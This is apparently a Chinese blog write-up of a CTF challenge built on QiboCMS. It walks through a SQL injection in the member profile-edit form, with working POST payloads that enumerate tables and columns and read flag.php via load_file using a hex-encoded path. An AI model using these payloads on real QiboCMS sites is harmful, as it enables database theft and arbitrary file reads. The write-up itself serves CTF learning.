i春秋CTF-“百度杯”CTF比賽 九月場-再見CMS

weixin_34249678發表於2018-11-01

1 資訊收集

拿到CMS搭的站, 首先需要確定網站使用的是何種CMS,百度得到該CMS為齊博CMS的整站系統:http://v7.qibosoft.com/

11129189-0cd68cd24df113f7.png
image

接下來,收集資訊,該CMS出現過哪些漏洞:

齊博整站/地方門戶SQL隱碼攻擊漏洞

2 漏洞利用

簡而言之,治理在修改資訊時,有一個SQL隱碼攻擊漏洞。

接下來,我根據大佬的描述,寫payload,利用這個漏洞:

0- 註冊使用者,記一下uid和email

1-報錯測試:

url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
# email 為註冊時的email
POST:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid=
11129189-b57a20fa0234a5ca.png
image

2-加上注入語句

url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
POST data:
truename=xxxx%0000&Limitword[000]=&email=123456@qq.com&provinceid= , address=(select version()) where uid = 3 %23
11129189-be7572b8bf5f48a8.png
image

3-查表:

POSTdata:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid= , address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid = 3 %23
11129189-c91943747b17a114.png
image

4-查列名

POSTdata:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid= 
, address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23
11129189-97b0590f35cd5a9e.png
image

但是沒有直接的flag,只能考慮利用load_file

5-payload

掃描一下發現,網站更目錄下,有一個flag.php

11129189-28d3eb5822747f9b.png
image

load_file函式讀取這個檔案:/var/www/html/flag.php

truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid= 
, address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23
11129189-e7c4b47ef19142f2.png
image

相關文章